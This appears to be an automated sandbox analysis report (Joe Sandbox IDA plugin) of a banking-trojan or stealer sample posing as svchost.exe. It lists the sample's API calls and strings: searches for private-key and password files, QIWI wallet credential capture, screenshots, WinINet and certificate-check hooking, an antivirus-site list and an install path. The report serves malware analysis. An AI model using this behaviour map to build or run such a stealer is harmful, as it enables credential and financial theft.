                                                                                                                                                                                                            • String ID: 6D1DA248$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0Wu$path.txt
                                                                                                                                                                                                            • API String ID: 2217318736-1038123260
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C832F0: IsUserAnAdmin.SHELL32 ref: 02C832FA
                                                                                                                                                                                                              • Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83330
                                                                                                                                                                                                              • Part of subcall function 02C832F0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02C83357
                                                                                                                                                                                                              • Part of subcall function 02C832F0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02C8337A
                                                                                                                                                                                                              • Part of subcall function 02C832F0: GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02C833ED
                                                                                                                                                                                                              • Part of subcall function 02C832F0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C833F4
                                                                                                                                                                                                              • Part of subcall function 02C832F0: memset.MSVCRT ref: 02C83404
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C842E1
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C842F6
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                              • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02C84315
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02C8432C
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C84344
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843AC
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C843AF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C843BC
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C843BF
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 02C8440E
                                                                                                                                                                                                            • TerminateThread.KERNEL32(00000338,00000000), ref: 02C84438
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$memset$Process$AdminCheckConnectionInternetTempUserlstrcpyn$AliveAllocCacheCountFileFlushFreeHeaderImageNameNetworkOpenPathQueryResolverSleepTerminateThreadTickValidateValue_snprintf
                                                                                                                                                                                                            • String ID: 92F35C4Ca$C:\Windows\apppatch\svchost.exe$id=1&post=%u
                                                                                                                                                                                                            • API String ID: 3337567932-2522799052
                                                                                                                                                                                                            • Opcode ID: 2ab172c36b168154a7e170d85e073d0d48a99f091999c4e4c8f498f21415e0a2
                                                                                                                                                                                                            • Instruction ID: bbd2204ae303518fbca62e2b7ffa70cbcb0041e8f9508d5356b3ba8fd619da67
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ab172c36b168154a7e170d85e073d0d48a99f091999c4e4c8f498f21415e0a2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4513B71E802466BE735ABB0AC49FBA7B6DDF84B08F048694F609D71C1EB70D504CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Crypt32.dll,00000000,00000000,7556F550,00000000), ref: 02C800CE
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CertVerifyCertificateChainPolicy), ref: 02C800E4
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000006,00000040,?,75571620), ref: 02C800FC
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000006,?,?), ref: 02C8011E
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Wininet.dll,00000000,00000000), ref: 02C8012A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 02C80140
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestW), ref: 02C8015C
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 02C80178
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HttpSendRequestExW), ref: 02C80194
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetQueryDataAvailable), ref: 02C801B0
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 02C801CC
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFileExA), ref: 02C801E8
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetReadFileExW), ref: 02C80204
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 02C80220
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoadProtectVirtual
                                                                                                                                                                                                            • String ID: CertVerifyCertificateChainPolicy$Crypt32.dll$HttpSendRequestA$HttpSendRequestExA$HttpSendRequestExW$HttpSendRequestW$InternetCloseHandle$InternetQueryDataAvailable$InternetReadFile$InternetReadFileExA$InternetReadFileExW$Wininet.dll
                                                                                                                                                                                                            • API String ID: 1705253364-835984666
                                                                                                                                                                                                            • Opcode ID: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
                                                                                                                                                                                                            • Instruction ID: d3d08d81a9f4b24674397dfb42814877a6d3e56e70194442aa7d9c041c26f86b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ea05016a823ce1192b41bd76d47603c3c2e7eb29b6b33b6f0fb218726745ecd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9931C771BC031A35FA2276744C46FAF975E4F85F99F018534B803B2445DBA6E70989B8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 02C8DA6D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA2CA), ref: 02C8DAAE
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA2CA), ref: 02C8DAE2
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,6D1DA2CA), ref: 02C8DAF7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8DB01
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8DB09
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DB1A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8DB21
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DB5B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8DB68
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA2CA,02CBDAD8,02CBDAD9), ref: 02C8DBA9
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8DBE4
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8DBEE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8DBF6
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8DC07
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8DC0E
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8DC4B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8DC58
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8DE40,02CBDAD8,00000000,00000000), ref: 02C8DC8E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8DCA6
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8DCB7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$ErrorFileLast$BackslashCreate$AdminAttributesDeleteDirectoryFolderHandleMakeSystemUser$CloseInformationThread
                                                                                                                                                                                                            • String ID: 6D1DA2CA$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                            • API String ID: 448721894-1513253894
                                                                                                                                                                                                            • Opcode ID: 400d5898fa59baa4187225590c2ebc197c0e41cae4a2fb2c7564df7c8e919a4f
                                                                                                                                                                                                            • Instruction ID: 8815aab9caae678beb954c7b7f2384fd36a2e34a63283f0a9db963741f17374a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 400d5898fa59baa4187225590c2ebc197c0e41cae4a2fb2c7564df7c8e919a4f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24712871A406955FD7129F389C58BEABBE8EF85305F14C6D4E98BC7240DB70CA49CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 02C80EF3
                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 02C80F04
                                                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 02C80F19
                                                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C80F2E
                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 02C80F48
                                                                                                                                                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00660046), ref: 02C80F76
                                                                                                                                                                                                            • GetObjectA.GDI32(00000000,00000018,?), ref: 02C80F8C
                                                                                                                                                                                                            • GlobalAlloc.KERNEL32 ref: 02C80FF0
                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 02C81001
                                                                                                                                                                                                            • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 02C81020
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02C8131E,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C8103C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 02C8107D
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 02C8109A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02C810B6
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 02C810BD
                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 02C810C4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C810DC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C810EE
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02C810FB
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 02C81107
                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 02C81113
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileGlobal$CreateObjectWrite$CompatibleHandleRelease$AllocBitmapBitsCloseCursorDeleteFreeInformationLockSelectUnlock
                                                                                                                                                                                                            • String ID: ($6
                                                                                                                                                                                                            • API String ID: 1662540191-4149066357
                                                                                                                                                                                                            • Opcode ID: 994efae198a796a2b8028be584b661c703fe59ac19df0273a5704bacf482aad1
                                                                                                                                                                                                            • Instruction ID: f65ab8c0bae4c2ed15dfae3902ced4cd321ad6f1f88fe3bb7d017c44247e62ea
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 994efae198a796a2b8028be584b661c703fe59ac19df0273a5704bacf482aad1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90612871944340AFD311DF65DC89B6BBBE8EFC8754F048A1CFA4993280DBB4D9058BA2
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,avast.com,?,?,02C7585C), ref: 02C7570B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kaspersky,?,?,02C7585C), ref: 02C7571B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,drweb,?,?,02C7585C), ref: 02C75727
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,eset.com,?,?,02C7585C), ref: 02C75733
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,antivir,?,?,02C7585C), ref: 02C7573F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,avira,?,?,02C7585C), ref: 02C7574B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,virustotal,?,?,02C7585C), ref: 02C75757
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,virusinfo,?,?,02C7585C), ref: 02C75763
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,02C7585C), ref: 02C7576F
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,trendsecure,?,?,02C7585C), ref: 02C7577B
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,anti-malware,?,?,02C7585C), ref: 02C75787
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,.comodo.com,?,?,02C7585C), ref: 02C75793
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                            • API String ID: 0-375433535
                                                                                                                                                                                                            • Opcode ID: cc61648bfb30b67e65d85107ca5f90452ea4f24be874ee4712b586ef10f07e3d
                                                                                                                                                                                                            • Instruction ID: d090923e131477c12c4cec90647dd52a86651fcb6ca3814de5afc97d4e454eb4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc61648bfb30b67e65d85107ca5f90452ea4f24be874ee4712b586ef10f07e3d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 260139D63A67E6717A73317A0C92F9F4A8C4ED1CC8B410675FC09E2105E7A6DB0308B5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02C7149C,00000000,?), ref: 02C7101B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,7556F570,?,02C7149C,00000000,?), ref: 02C7103E
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71045
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C71055
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,7556F570,?,02C7149C,00000000,?), ref: 02C71073
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02C7149C,00000000,?), ref: 02C71093
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C906E0,00000000,00000000,00000000), ref: 02C710A3
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8F1B0,00000000,00000000,00000000), ref: 02C710D0
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,\secrets.key,?,?,02C7149C,00000000,?), ref: 02C710EC
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,sign.key,?,02C7149C,00000000,?), ref: 02C71102
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C911C0,00000000,00000000,00000000), ref: 02C7111B
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?,?,02C7149C,00000000,?), ref: 02C7112F
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71140
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71155
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71158
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71164
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71167
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                            • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                            • API String ID: 3254303593-2345338882
                                                                                                                                                                                                            • Opcode ID: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
                                                                                                                                                                                                            • Instruction ID: 4ba0e2f269905619e1da183914577106412ee6c3aa111e834bdfd4dedbef0bba
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A741E731A401A17B9B326A665C8CEAB7B7CDFC6F94F088719F919A7040DB71C611C6B0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C903E9
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C903FC
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C9040F
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0BC), ref: 02C9043D
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0BC), ref: 02C90473
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,6D1DA0BC), ref: 02C90488
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C90492
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C9049A
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C904AB
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C904B2
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C904BF
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C90540,00000000,00000000,00000000), ref: 02C90508
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C90520
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C90531
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Pathstrstr$BackslashCreateDirectoryErrorHandleLast$AdminCloseCurrentFolderInformationMakeSystemThreadUser
                                                                                                                                                                                                            • String ID: 6D1DA0BC$GET $pass.txt$password=$phone=$w.qiwi.ru
                                                                                                                                                                                                            • API String ID: 554474407-672413753
                                                                                                                                                                                                            • Opcode ID: edd3454b842262869fdc0c67ea75b0bb88a63f68ee895313ac0426a4e152f567
                                                                                                                                                                                                            • Instruction ID: 2a174f549657d50b6b9ead6a098b81d6fee8c9a1354c359d70f9939a41d377c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: edd3454b842262869fdc0c67ea75b0bb88a63f68ee895313ac0426a4e152f567
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD415931E4025D9BEF218E34AC5CBEB7BACAF81705F244698F88597140EB70D685CB95
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA,?,76C0BF00), ref: 02C8FA40
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,76C0BF00), ref: 02C8FA81
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,76C0BF00), ref: 02C8FA8B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8FA93
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8FAA4
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,76C0BF00), ref: 02C8FAAB
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,76C0BF00), ref: 02C8FAEA
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,76C0BF00), ref: 02C8FAF7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,76C0BF00), ref: 02C8FB40
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,76C0BF00), ref: 02C8FB5C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,76C0BF00), ref: 02C8FB79
                                                                                                                                                                                                              • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75495CE0,?,02C82840,?), ref: 02C97B63
                                                                                                                                                                                                              • Part of subcall function 02C97B50: RtlAllocateHeap.NTDLL(00000000,?,02C82840,?), ref: 02C97B66
                                                                                                                                                                                                              • Part of subcall function 02C97B50: memset.MSVCRT ref: 02C97B7B
                                                                                                                                                                                                              • Part of subcall function 02C97B50: CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
                                                                                                                                                                                                              • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
                                                                                                                                                                                                              • Part of subcall function 02C97B50: HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
                                                                                                                                                                                                              • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
                                                                                                                                                                                                              • Part of subcall function 02C97B50: HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,76C0BF00), ref: 02C8FBA8
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA,?,76C0BF00), ref: 02C8FBC7
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,?,76C0BF00), ref: 02C8FC2B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,76C0BF00), ref: 02C8FC38
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75495CE0), ref: 02C97D61
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: _snprintf.MSVCRT ref: 02C97D7D
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: FindFirstFileA.KERNEL32(00000000,?), ref: 02C97D8C
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: LocalFree.KERNEL32(00000000), ref: 02C97D99
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DD8
                                                                                                                                                                                                              • Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DE6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$FreePathProcess$AllocAttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminAllocateCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                            • String ID: 6D1DA0AA$\$inter.zip$path.txt
                                                                                                                                                                                                            • API String ID: 3271220685-2446218553
                                                                                                                                                                                                            • Opcode ID: 2cffffbe691cc65060450dcf91376301718293bd22c808996af54d038fe893d7
                                                                                                                                                                                                            • Instruction ID: 9bb7c9631274bbb94ac3368ab62ddaff185e6de9522194c02445509fab95a5b1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cffffbe691cc65060450dcf91376301718293bd22c808996af54d038fe893d7
